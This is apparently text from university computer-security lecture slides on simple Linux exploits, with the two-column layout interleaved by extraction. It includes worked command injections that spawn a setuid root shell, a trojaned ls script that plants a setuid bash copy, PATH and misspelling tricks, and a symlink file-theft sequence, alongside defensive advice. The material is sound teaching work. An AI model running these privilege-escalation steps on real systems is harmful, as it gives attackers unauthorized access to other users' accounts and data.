What do Hackers Want?

Simple Exploits o Your data: credit card number, financial information,

SSN, personal information.
o Your disk: pirated software (warez), illegal copies of
movies/videos, porn, ...

Thursday/Monday, October 16/20, 2014 o Your CPU (e.g. to crack passwords)

Reading: Hacking Linux Exposed
o Your bandwidth: send spam, participate in botnet,
stepping stone to other attacks.
CS342 Computer Security
o To deny resources to you or your customers: for
Department of Computer Science
blackmail, competition, revenge.
Wellesley College
o ⇒ To own (pwn)/root your machine (or at least your
account) by exploiting vulnerabilities.
Simple Exploits 12-2

Overview Essence of Exploits

Goal: discuss typical vulnerabilities & exploits in Linux. o Study details/assumptions of system
Understand these for PS4 Treasure Hunt problem!
o elevation of privilege o Take advantage of details and violate assumptions!
o password exploits (recall the Hacker Curriculum and Security Mindset).
o incorrectly set permissions
o US Postal System examples; (Note: do not try these!)
o leveraging SUID/SGID programs
o code injection • Can you send a letter without a stamp?
o trojaned commands • Can you reuse a stamp?
o PATH exploits
o misspelling exploit
o symbolic link exploits
o document exploits
o backdoor rootshells

Simple Exploits 12-3 Simple Exploits 12-4

Elevation of Privilege Password Exploits
Holy grail = rootshell, but the path there may be circuitious. If I know your password, I can be you on your computer.
Also, may only need to get partially there.
o Watch for passwords "sent in the clear" on network (especially
wireless)
guest
o Find passwords stored unprotected on computer, perhaps in public
files, emails, code, comments, logs, .bash_history, etc. The
student permissions on some of these files might be set incorrectly.
o Online password guessing (perhaps using knowledge of victim).
faculty o Offline password cracking (e.g. John the ripper) -- must be able to
read password file.
sysadmin o Use passwords from keystroke logger
o Social engineering: shoulder surfing, trick people to divulge
root passwords, look at postits near computer, dumpster diving

Simple Exploits 12-5 Simple Exploits 12-6

.bash_history file Use the source, Luke!

"wendy@cs342-ubuntu-1:~$ cat ~/.bash_history Try to find and study the source code for potentially
sudo emacs
su – guest vulnerable programs:
su – foo o In code, may find vulnerabilities like overflowable
sudo emacs &
buffers, overflowable numbers, code injection,
wendy@cs342-ubuntu-1:~$ ls -al ~/.bash_history hardwired accounts and passwords, etc.
-rw------- 1 wendy wendy 68 Sep 16 08:59 /homewendy/.bash_history
o In comments, may find notes on potential
vulnerabilities, passwords, etc.
o Permissions are sometimes incorrectly set, so others can view
this file.
o Sometimes contains information valuable for attacker
(e.g., passwords typed “out of phase”)
o Sometimes contains forensic information for understanding
an attack.

Simple Exploits 12-7 Simple Exploits 12-8

SUID and SGID Program Attacks Simple SUID Example: mycat
o Use Linux find command to find all accessible SUID and SGID o User lynux creates a secret file
programs – prime targets for privilege escalation. [lynux@salmon exploits]$ echo "This is lynux's secret file" > secret.txt
o Find source code for these programs to look for vulnerabilities. [lynux@salmon exploits]$ chmod 750 secret.txt
o Disassemble and study object code. o To test SUID programs, user lynux makes an SUID copy of cat named
o Use strace to study system calls made (don’t forget –f flag) mycat. Forgets to change permissions back.

o Use Linux strings command to see strings in object code (e.g. [lynux@salmon exploits]$ which cat
/bin/cat
prompts, help messages, error messages, system functions linked
to, etc.) [lynux@salmon exploits]$ cp /bin/cat mycat; chmod u+s mycat: ls -l mycat
-rwsr-xr-x. 1 lynux lynux 48040 Sep 25 15:39 mycat
o Experiment with SUID/SGID programs to find & exploit
vulnerabilities: o Attacker gdome uses mycat to read lynux s secret file
• Use gleaned knowledge to craft diabolical inputs (for buffer [gdome@salmon exploits]$ cat secret.txt
overflows, code injection, etc.) cat: secret.txt: Permission denied
• Try boundary case and out-of-range inputs (e.g., negative [gdome@salmon exploits]$ ./mycat secret.txt
numbers, large numbers, empty string, very long strings) This is lynux's secret file
Simple Exploits 12-9 Simple Exploits 12-10

Another SUID Example Code Injection Exploits

o User lynux writes SUID program ~/bin/submit username psetfile Bad guys can take advantage of shoddy input handling to execute arbitrary
code as someone else.
to submit student pset data files to ~/psets/username/psetfile.
o Filename mangling from previous example.
o The code for submit is essentially o Inject Linux commands into C programs that execute strings constructed
write the contents of psetfile to the file whose name is the from user input.
concatentation ~/psets/ + username + / + psetfile o Inject HTML and JavaScript into web pages that include user input in page
(e.g., original Tanner photo contest site).
o What kind of attacks can be made with this program?
o Inject database commands into SQL programs: e.g., xkcd's "Exploits of a
Mom": http://xkcd.com/327/

Simple Exploits 12-11 Simple Exploits 12-12

 Code Injection: newpasswd Example Code Injection: newpasswd Example part 2
Suppose root tries to make command-line passwords (only available to
Next, the machinations to make newpasswd setuid:
root) available to everyone via a setuid script:
#!/bin/bash –p // Contents of /root/newpasswd.c
# contents of /root/newpasswd.sh int main (int argc, char* argv) {
echo "Executing /root/newpasswd.sh" execv("/root/newpasswd.sh", argv);
echo $1 | /usr/bin/passwd --stdin `whoami` }
o In raw C, can use system to execute string argument in a shell:
system ”echo $1 | /usr/bin/passwd --stdin `whoami`” [root@localhost ~]# gcc -o newpasswd newpasswd.c
o Other ways to construct and execute code out of parts on the fly: [root@localhost ~]# cp newpasswd /usr/bin/newpasswd
• C’s exec, execv, and execve [root@localhost ~]# chmod 4755 /usr/bin/newpasswd
• eval in JavaScript, Python, PHP, Perl, and Lisp
[root@localhost ~]$ ls -l /usr/bin/newpasswd
o This code won't really work anyway because /usr/bin/passwd only -rwsr-xr-x 1 root root 4832 2008-09-23 06:16 /usr/bin/newpasswd
allows the --stdin option for real UID root, not for effective UID
root. But let's suppose root doesn't know this.
o Ubuntu doesn’t support –-stdin option (but some other Linuxes do)
Simple Exploits 12-13 Simple Exploits 12-14

Code Injection: newpasswd Example part 3 Code Injection: newpasswd Example part 4
Now gdome tries out newpasswd: [gdome@localhost ~]$ newpasswd foo; cp /bin/bash ~gdome/
mine; chmod 4755 ~gdome/mine; echo bar"
[gdome@localhost ~]$ newpasswd foobar Executing /root/newpasswd.sh
Executing /root/newpasswd.sh foo
Only root can do that. Only root can do that.

The underlying /usr/bin/passwd fails because real UID gdome != root. [gdome@localhost ~]$ ls -l mine
But gdome can still do sneaky things! -rwsr-xr-x 1 root gdome 735004 2008-09-23 06:04 mine

[gdome@localhost ~]$ newpasswd foo; echo bar; echo baz" [gdome@localhost ~]$ ./mine -p
Executing /root/newpasswd.sh mine-3.2# whoami
foo root
bar
Only root can do that.

Simple Exploits 12-15 Simple Exploits 12-16

Preventing Code Injection Exploits Trojaned ls program
o Don t directly execute input or embed it in system contexts #!/bin/bash
(like filenames). # gdome s ~/bin/ls_trojan program

o If you must use user input directly, first either # Make suid shell in /tmp/foo
cp /bin/bash /tmp/foo
• Verify that input doesn t contain problematic parts:
chmod 4755 /tmp/foo
! semicolons in Linux commands
# Now do what ls does
! .. or starting / in filenames
exec ls "$@
! unmatched string quotes, angle brackets (HTML), parens
(Javascript)
Now gdome tries to trick other users into running
! Code fragments (HTML, Javascript, …) her ls program in place of regular ls.
• Sanitize input to remove problematic parts.
Path attacks are one way to do this.

Simple Exploits 12-17 Simple Exploits 12-18

Linux PATH variable: Prelude to An Exploit Overriding PATH with Absolute Pathnames
Linux uses PATH variable to find executables. (This variable is set/changed in Can override PATH mechanism by giving absolute pathname
~/.bash_profile, ~/.bashrc)
[lynux@localhost ~]$ which ~/bin/passwd
[lynux@localhost ~]$ echo $PATH
/usr/kerberos/bin:/usr/local/bin:/usr/bin:/bin:.:/home/lynux/bin:. ~/bin/passwd

Linux searches PATH in order to find an executable for a relative [gdome@localhost setuid]$ echo $PATH
(non-absolute) pathname. Can see what it finds with which command. /usr/kerberos/bin:/usr/local/bin:/bin:/usr/bin:/home/gdome/bin
[lynux@localhost ~]$ which passwd
/usr/bin/passwd [gdome@localhost setuid]$ which rootshell
[lynux@localhost ~]$ which ls /usr/bin/which: no rootshell in (/usr/kerberos/bin:/usr/local/bin:
/bin/ls /bin:/usr/bin:/home/gdome/bin)
[lynux@localhost ~]$ which findit
~/bin/findit [gdome@localhost setuid]$ which ./rootshell
[lynux@localhost ~]$ which rootshell ./rootshell
/usr/bin/which: no rootshell in (/usr/kerberos/bin:/usr/local/bin:/usr/bin:
/bin:.:/home/lynux/bin:.)

[lynux@localhost ~]$ cd ~/cs342/download/setuid/

[lynux@localhost setuid]$ which rootshell
./rootshell
Simple Exploits 12-19 Simple Exploits 12-20
Linux Path Exploit: PATH begins with . Avoiding Linux Path Exploit
Suppose "." is at the beginning of PATH: Can avoid the above attack by putting "." at end of PATH or excluding
it altogether.
[lynux@localhost ~]$ export PATH=.:$PATH; echo $PATH
.:/usr/kerberos/bin:/usr/local/bin:/usr/bin:/bin:.:/home/lynux/bin ... lynux in a new shell after moving . to end of PATH …

Nefarious gdome can trick lynux into running her trojaned ls program: [lynux@localhost ~]$ echo $PATH
/usr/kerberos/bin:/usr/local/bin:/usr/bin:/bin:/home/lynux/bin:.
[gdome@localhost ~]$ cp ~/bin/ls_trojan ~/public_html/ls

[lynux@localhost ~]$ cd ~gdome/public_html/; ls -l index.html [lynux@localhost ~]$ cd ~gdome/public_html/

-rwxrwxr-x 1 gdome gdome 34 2008-09-16 05:09 index.html
[lynux@localhost public_html]$ which ls
[gdome@localhost ~]$ ls -al /tmp/foo /bin/ls
-rwsr-xr-x 1 lynux lynux 735004 2008-09-19 07:47 /tmp/foo

[gdome@localhost ~]$ /tmp/foo –p

foo-3.2$ whoami
lynux
Simple Exploits 12-21 Simple Exploits 12-22

Misspelling Exploit Symbolic Links in Linux

Even if "." at end of PATH, still subject to misspelling attacks. Make "aliases" in Linux via symbolic links: ln -s oldname newname

[gdome@localhost ~]$ cp ~/bin/ls_trojan ~/public_html/sl [lynux@localhost ~]$ cd ~/bin

Then can still have trouble if lynux mistypes "ls" as "sl": [lynux@localhost bin]$ ln -s /usr/java/jdk1.6.0_06/bin/java java1.6

[lynux@localhost ~]$ cd ~gdome/public_html/; sl -l index.html [lynux@localhost ~]$ cd ~

-rwxrwxr-x 1 gdome gdome 34 2008-09-16 05:09 index.html
[lynux@localhost ~]$ which java1.6
(Or: could modify sl to print bash: sl: command not found )
~/bin/java1.6
[gdome@localhost ~]$ ls -al /tmp/foo
-rwsr-xr-x 1 lynux lynux 735004 2008-09-19 07:47 /tmp/foo [lynux@localhost ~]$ java1.6 -version
java version "1.6.0_06"
[gdome@localhost ~]$ /tmp/foo –p Java(TM) SE Runtime Environment (build 1.6.0_06-b02)
foo-3.2$ whoami Java HotSpot(TM) Client VM (build 10.0-b22, mixed mode, sharing)
lynux

Simple Exploits 12-23 Simple Exploits 12-24

 Symbolic Link Exploit: Part 1 Symbolic Link Exploit: Part 2
Could anything go wrong with the following? Suppose gdome did the following *before* lynux's operations:
[lynux@localhost ~]$ cat personal.txt [gdome@localhost ~]$ touch lynsecret
My credit card number is 1234 5678 1011 1213
[gdome@localhost ~]$ chmod 777 lynsecret
[lynux@localhost ~]$ cp personal.txt ~/tmp/saved
[gdome@localhost ~]$ cd ~lynux/tmp
... lyunx does some other operations ...
[gdome@localhost tmp]$ ln -s /home/gdome/lynsecret saved
[lynux@localhost ~]$ cp ~/tmp/saved personal.txt
Then gdome now knows lynux's secret after lynux s operations!
[lynux@localhost ~]$ rm ~/tmp/saved
[gdome@localhost tmp]$ cat ~/lynsecret
Suppose the permissions on tmp are: My credit card number is 1234 5678 1011 1213
This trick can be used to access files written by root to system
[lynux@localhost ~]$ ls -al tmp
/tmp directory!
total 48
drwxrwxr-x 2 lynux cs342stu 4096 2008-09-19 08:57 . How to avoid this attack?
…

Simple Exploits 12-25 Simple Exploits 12-26

Maintaining Access (HLE Ch. 10) Document Exploits

Once a hacker has rooted your machine, what can they do to maintain o Examine metadata, comments, change-tracking records
access for the future? of MS Word doc.
o Leave behind “backdoor” rootshells
o In redacted documents, look for redacted elements.
o Install Trojaned system programs. E.g.:
• change passwd , sudo, etc. to record passwords & send to attacker. o Remove saving/printing restrictions from PDF
• make more/cat setuid/setgid to allow reading of any file. document.
• change safe program to be vulnerable to a code injection attack,
buffer overflow attack, etc.
o Examine metadata in images/video (time, possibly
• install keystroke logger (keylogger)
location, …)
• many such Trojaned binaries often bundled into rootkits that hide o Digital watermarks on documents and images.
their existence by changing basic commands like ls, ps.
o For more details, see:
o Change system configuration files, E.g.,
• hosts .allow & hosts.deny: control which clients are allowed to connect • S&M Ch. 13 Office Tools and Security
to a machine.
• Abelson, Ledeen, & Lewis Blown To Bits, Ch. 4: Ghosts in the
• httpd.conf: configures HTTP server, including various security Machine – Secrets and Surprises of Electronic Documents .
settings.
Simple Exploits 12-27 Simple Exploits 12-28
Other Attacks We ll Study
o Buffer overflow attacks

o Format string attacks

o Cross-site scripting

o Drive-by downloads

o Network attacks

o Malware: viruses, worms, Trojans, rootkits, spyware

Simple Exploits 12-29